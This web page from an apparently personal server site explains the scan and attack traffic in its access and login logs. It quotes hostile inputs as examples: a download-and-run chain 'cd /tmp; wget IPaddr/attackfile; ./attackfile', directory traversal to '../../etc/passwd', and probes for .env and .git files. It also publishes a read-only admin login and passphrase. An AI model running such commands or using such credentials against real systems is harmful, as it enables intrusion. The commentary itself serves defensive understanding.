Probes from the World

polycosmic-zervertest.zapto.org

Home

History

Downloads

Full Help Text

ProbesByWorld

About

Admin

Web Accesses and Login Attempts Received from the World

Log Analysis request_uri -- /web/v1/probes.html

Any internet-connected system with any ports exposed to the wild and wooly internet should expect probes and scans from many addresses around the planet. If this is such a system, there may be entertaining stuff in the Log Files.

Notes on results that can be selected above --

Weblog Status Codes --

200 -- Okay, URL was recognized and returned a web page.
301, 302 -- Redirect. In the detail logs, this is typically followed immediately by the GET or POST to the re-directed location.
404 -- Not found, no such /directory/, file or web page.
401 -- Authorization needed. In the detail logs, this can be followed by a repeat request, but with a userid and passphrase supplied.
400 -- Malformed or unrecognized format. For the URL "/", the root of the documents tree, this can occur for malformation of some additional data that is not shown in these log entries.
There are many other status values.

Random observations for Weblog URLs --

.env files -- if found, expected to contain "environment values" that might be useful to a program, such as PATH, that describe where on a system to look for programs for command names. Apparently there could be security-related values, such as passwords to be automatically supplied when there is a login to another system.
.git files -- git is a source-code control system used with software development and could be used for web-site development. Apparently looking for details of the inner working of the web-site.
.php files -- a programming languages frequently used in web-site development.
wp- files -- WordPress is an elaborate program (online blogs?) that apparently has a lot of possible security vulnerabilities.
GET /web/dnld/... -- This directory has a number of large files first created when this represented a product from a functioning company, including software-update files with a ".tar" suffix, bootable CD image files (also containing software-update files) with an ".iso" suffix, and bootable disk images (compressed) suitable for VirtualBox with ".vdi.gz" and ".vhd.zip" suffixes. There are not a lot of NetZerver products in use on the planet, and it is not clear why there should be so many downloads of these files. There have been reports of a group looking for and downloading ".iso" files hoping to find copyright-protected commercial releases, with a business plan to threaten a site for copyright violations. There may be downloads from agencies looking for trade-secret information inadvertenly left publicly accessible. These files may be raw material for download speed tests. None of this seems to explain why there would be so many downloads to so many places.
\x16\x03... operations -- non-printable characters, hexadecimal 16 and 03, where the operation GET, POST, or HEAD is expected. Apparently looking for an entertaining mis-handling.
{ lines -- apparently looking for a web-server that will treat this line as some kind of RPC-Remote-Procedure-Call.
../ and .%2e/ and .%2e%2f -- In path names in the URL part and in URL parameters after the '?', this can mean to go one directory closer to the file-system root, in an attempt to access a file that is outside of the web documents part of the file-system, frequently ../../etc/passwd.
wget -- This program can fetch files over the internet, and can be found as part of the parameters for a URL that is intended to execute as a command. Frequently part of "cd /tmp; wget IPaddr/attackfile; ./attackfile" trying to download and then run a file on the target system.
favicon -- If found, can be used for a tiny graphic on a web-browser tab, or with a line in a BookMark list. There can be multiple favicon files for different environments, e.g. apple-touch-icon.png
robots.txt -- Intended as direction to a search-engine scan for parts of the web-site to be indexed, and parts to be left alone.
IPaddrs mask to /24 or /64 -- A request from an individual using a web-browser can be a small swarm of requests for the web-page, any associated graphic files and favicon files, all coming from a single IPv4 or IPv6 InternetProtocol address, within a few seconds. Deliberate scans, both search-engines and attack-bots, frequently use multiple IP addresses that are closely associated. Listing 32-bit IPv4 address as /24-bit regions, and 128-bit IPv6 addresses as /64-bit regions, is an attempt at identifying closely-associated accesses. This is not ideal. For example, "googlebot" addresses are in a group with a whois listing of 66.249.64.0 up to 66.249.95.255, a much larger /19-bit range.
host or whois lookup -- on Linux/Unix systems, command "host" IPaddr and "whois" IPaddr can sometimes reveal a DNS-name or some organization info about the address. This is frequently pointless, showing a rent-a-system at Amazon, Google, or Microsoft, paid for by the attacker, or which may have been compromised by discovery of a vulnerability and is running a scan quietly in the background, unaware to those who are paying the rent.

The Web access values are discarded with each reboot, and discarded above a limit size.

Random observations for LoginLog --

AttackBot behavior, upon stumbling onto an open port, can vary from one Login attempt every 25 minutes (intended to be unnoticable on casual examination of the Logfile) from a single IPaddress, to multiple attempts every minute using a swarm of widely-separated IPaddress, each no more than 30 times, over the course of months.
Frequent userids for recent low-frequency attack -- root, admin, ubuntu.
Userids for a high-volume attack seem to be taken from some list, rather than just generating e.g. all 3-letter combinations.
This software does not capture the attempted passwords, except when the userid-password list apparently got a bit out-of-sync and showed "userids" of "123456" and "p@ssword".
You might see a successful ssh_check rsync_ssh login by cbertsch, as part of the updates to this web-site.

The Login Log is maintained over system reboot, but results are discarded above a (likely different) limit size.

If this is expected to be a low-traffic system, then almost all of this traffic is the result of various bots doing automated scans of parts of the internet address space.

Some of these scans are benign -- e.g. Google builds its indexes by regularly scanning every system that has a name.

Some are benign-ish -- companies probing for security problems, not to steal data or cause damage, but to sell or provide security monitoring.

Most are looking for exploit opportunities, to steal data, to encrypt data for ransom, or to load and run the attacker's code to use the target's cpu and network bandwidth for further scans of other systems.

Note that for at least one of the systems carrying this text, at polycosmic.net, the detailed log files can be examined using a "read-only" admin userid "rodmin", with credential "Heisenberg42"

Contact us at polycosmic.info /at/ gmail
or at cbertsch /at/ cox.net
All text on this website, nonsense and otherwise, is 100% organic generated,
with one exception: On Contact-Us webpage, some answers to "I-am-not-a-robot" field appear to be generated by robots.

None
Weblog IPaddrs
Weblog IPaddrs mask to /24 or /64
Weblog URL only
Weblog Operation URL Status
Weblog Op URL Status of 200,301,302
Weblog Op URL Status of not200
Weblog Userid Op URL Status
LoginLog begin line for each protocol
LoginLog begin and deny lines
LoginLog deny lines
LoginLog deny lines IPaddrs
LoginLog deny lines IPaddrs mask to /24 or /64